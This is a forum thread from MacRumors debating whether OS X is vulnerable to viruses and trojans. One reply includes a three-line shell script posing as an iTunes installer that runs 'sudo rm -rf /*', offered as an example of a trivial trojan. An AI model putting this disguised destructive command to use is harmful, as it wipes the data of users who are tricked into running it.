Sidebar Sidebar
Become a MacRumors Supporter for $50/year with no ads, ability to filter front page stories, and private forums.

OS X Viruses: What's the truth?

I'm not sure any OS can be secure against viruses. It would have to be able to divine the intent of a program, maybe by static inspection, and say "No, this program is malicious, I will not run it." I think the best thing would be if when you run a program for the first time the OS offers to run it in a virtual machine for you. Even if the program knows all the flaws of OS X, it will only destroy the virtual machine.

Ultimately it comes down to trust - I don't run anti virus software on either my Mac or PC, and the reason is that I only go to a limited set of websites I trust, and am very careful about running programs from people I don't know.
 
mkrishnan said:
So you're saying the trojan was able to replicate in MacOS but not take action? I'm guessing through some mechanism involving Word macros?
Click to expand...



that's what I'm guessing. . .only my word files (in that specific folder) were damaged
 
daveL said:
A couple of years back there was a security company (I think) that ran a contest offering US$13,000 to hack a Mac they had up on the 'net without any special security protection. The prize was never claimed.
Click to expand...


Jajaja. Please... dream on! OS X might be a good system... but a good hacker with a will and bad intention will hack it in seconds... let's just keep the arrogancy to this forum for our entertainment; once it reaches out, I assure you the hacker community will make us sell our macs on ebay!
 
radio893fm said:
Jajaja. Please... dream on! OS X might be a good system... but a good hacker with a will and bad intention will hack it in seconds... let's just keep the arrogancy to this forum for our entertainment; once it reaches out, I assure you the hacker community will make us sell our macs on ebay!
Click to expand...

It's true. No-one hacked the OS8/9 system...

You say a good hacker will hack it in seconds? Where's the evidence for this? You may be right but back it up with some facts... show us how it's done...
 
Blue Velvet said:
It's true. No-one hacked the OS8/9 system...

You say a good hacker will hack it in seconds? Where's the evidence for this? You may be right but back it up with some facts... show us how it's done...
Click to expand...

I have no idea, or the will to hack or create a virus... so I can't show you how to do it... but please come back to life. There is not a perfect OS in the world, and there will never be one...

And yes it can be done is seconds, go ask the 2600hz people... just keep praying the MAC user base doesn't go from 3% to let's say 50% because you will see all types of annoyances hiting our OS X.
 
radio893fm said:
I have no idea, or the will to hack or create a virus... so I can't show you how to do it... but please come back to life. There is not a perfect OS in the world, and there will never be one...

And yes it can be done is seconds, go ask the 2600hz people... just keep praying the MAC user base doesn't go from 3% to let's say 50% because you will see all types of annoyances hiting our OS X.
Click to expand...

It has nothing to do with user base. Nobody said anything about perfect...

Don't you think the glory of being the first person to create a true OS X virus would be motivation enough?

Until I wake up one day, check these boards and find out about the first OS X virus, I won't even worry about it.
 
radio893fm said:
Jajaja. Please... dream on! OS X might be a good system... but a good hacker with a will and bad intention will hack it in seconds... let's just keep the arrogancy to this forum for our entertainment; once it reaches out, I assure you the hacker community will make us sell our macs on ebay!
Click to expand...

Here is the quote from the competition page which daveL is talking about


"We publicized the challenge and Hacke (the name of our server) via the Web and email, and information about the contest was carried by many diverse venues, including Ric Ford's MacInTouch, MacWEEK, Wired, TidBITS (of course), along with several Swedish publications, the Wall Street Journal, and the New York Times. The contest reward was initially 10,000 Swedish kronor (about $1,350 U.S.), but during the challenge we were able to increase the amount of prize money a couple of times, thanks to nine Swedish Apple resellers. In the end, the contest reward was 100,000 kronor, or approximately $13,500 U.S."
Click to expand...

You can get the full story here ***Full Story***

Needless to say, many good people missed an opporunity to earn some money in 'seconds'. I am not saying that OS X is fool proof or anything, but the legend is true. :D

cheers
 
radio893fm said:
Jajaja. Please... dream on! OS X might be a good system... but a good hacker with a will and bad intention will hack it in seconds... let's just keep the arrogancy to this forum for our entertainment; once it reaches out, I assure you the hacker community will make us sell our macs on ebay!
Click to expand...

Hardly would it be so quick or easy but it is possible.

The biggest problem is that Apple still does not distribute Mac OS X with the firewall turned on. If anything, it gives a hacker a way into the machine, even though it doesn't create holes in the other software. Services have to be turned on to be exploited and since most services are turned off by default, a hacker would have to attack in a way that's uncommon.

An increase in sales market share really won't make a difference--if there aren't holes available--the possibilities are the same.
 
Blue Velvet said:
It has nothing to do with user base.
Click to expand...

It has all to do with user base. Only 3% of the computer users cares about macs or know they exist.

99.9999% of the hackers are Intel Machine users. Do you honestly think a hacker will inverst money/time in a mac or a sun or another system just to create a virus? Please let's not be naive about this one...

The problem is we are so blinded by our 'extremist passion' for our machine/software that we have not realized that it is simply like any other thing out there, only a little bit more beautiful.

Ask Apple why do they have to release those so called "security patches"? Probably because a Hacker working for them is telling them... "hu, you might want to check this, I just broke into the system, let's fix that" and time and time again...
 
i do some freelance mac tech work, and the amount of "i have a virus!" phone calls i get is really amusing.

everyone is so paranoid. use common sense. do u open every stupid email u get from stangers? do u get asked for your admin password and are not sure why?

as for the other poster who said he could write a mac virus in minutes in sooooo full of S**T it is not funny. i'm still laughing. best laugh i've had in a while!

this thread is amusing! maybe i will go run Norton Anti-Virus to pass some time.
 
I think we are getting a bit confused with our terms. A security "attack" does not equal a virus, worm or trojan horse. The stats above showing Linux at #1 is going to be mostly DoS attacks. These attacks won't allow unauthorized access to these servers, although it may crash some. A DoS attack simply reduces the ability of the Web site to service requests. In short, these are network attacks rather than OS attacks. It wouldn't matter what OS was running the frontend Web server. I guess my only point here is that you have to be careful with these numbers and how you interpret them. A lot of the stats out there throw all types of security incidents into one pot, which really doesn't tell you much.
 
There ALWAYS will be virii for OS X. Here is the iTunes 10.0 virus I just pulled out of my behind. Spam this to a million people claiming it is a new version of iTunes. Some idiots will run it and then claim os x did not save them.

#!/bin/sh
echo "iTunes 10.0 Installer. Please enter password to continue"
sudo rm -rf /*

I am not sure exactly what that would do, because I really do not want to run it on my computer. Maybe there is something that would prevent something like this from running that I do not know about. Also, I am not even sure anti-virus software would detect this as the user DID give permission for it to run.
 
mkrishnan said:
So you're saying the trojan was able to replicate in MacOS but not take action? I'm guessing through some mechanism involving Word macros?
Click to expand...
The infamous macro viruses that were quite "popular" back in the late 90's. Then M$ - in it's infinite wisdom - changed the default setting in Office (both Mac an Windows) to NOT autorun any macro and the fun wore off... I've not seen any reports of new macro viruses since 1999...
 
The truth is a virus is ineveitable. For some reason there are people in the world that make viruses and it is only a matter of time before there is one for OS X. BUT there are a couple of boundries that make it more difficult and less desierable as previously mentioned in this post. Some day someone will want to put in the time and effort for it and they will get their name at the top of the list. But even then I am sure apple will patch the problem quickly and it wont be too big of a deal.
 
bubbagump said:
There ALWAYS will be virii for OS X. Here is the iTunes 10.0 virus I just pulled out of my behind.
Click to expand...

Yes, but that's really only a simple Trojan. It doesn't have any viral properties, unless you count putting it on Limewire and having it spread that way. ;) If you made a package out of that, and stuffed it with junk so it looked convincing in size, or said it was an updater script, or something like that, a user might run that, and they might provide their admin password to the sudo prompt, and it might delete a bunch of stuff....but it has no real way to spread.
 
Sun Baked said:
OS 9 was much more secure, but OS X can do so much more for a server.
Click to expand...

In what way(s) was OS9 much more secure? And why would Apple make a succeeding OS that was less secure? Especially when creating an OS for the internet age.
 
Apple Hobo said:
The TV show The Screen Savers had a similar contest years ago. They set up a PC and a Mac and gave out the IP address of both machines. Within minutes the stupid script kiddies blasted the PC with DoS attacks (which also blocked the real skilled crackers from trying to bust it). The Mac went untouched for several days. Leo Laporte was pissed at the DoS kiddie crap. ;)
Click to expand...

So your saying that after several days, the Mac was touched? Or did you mean "The Mac was completely untouched and then the contest ended."?
 
It's from 2003, but this article nicely summarizes many of the various points being made in this thread, and puts them in some perspective. An excerpt:

"Though many amateurs may be looking for, and finding, holes in Windows, the FreeBSD Unix code that forms the foundation of OS X has been prodded by legions of expert programmers for 30 years....

"'Many orders of magnitude more people look over the source code for OS X and the related BSDs than have access to Windows source code,' said John Klos, a developer of NetBSD, a flavor of Unix closely related to OS X.

"Thus, many of the obvious holes in OS X were closed years ago. That, some suggested, actually makes OS X a more attractive target."
 
My opinion comes from experience. I've owned an Apple computer since 1983. Started using Symantec Antivirus when it was first introduced, can't remember the year. Used to be that the updates were yearly. Then monthly, now the updates seem to be weekly. In all my years with an Apple computer they haven't ever given me any notification of a problem.
 
You must log in or register to reply here.
Register on MacRumors! This sidebar will go away, and you'll see fewer ads.
Top Bottom
Back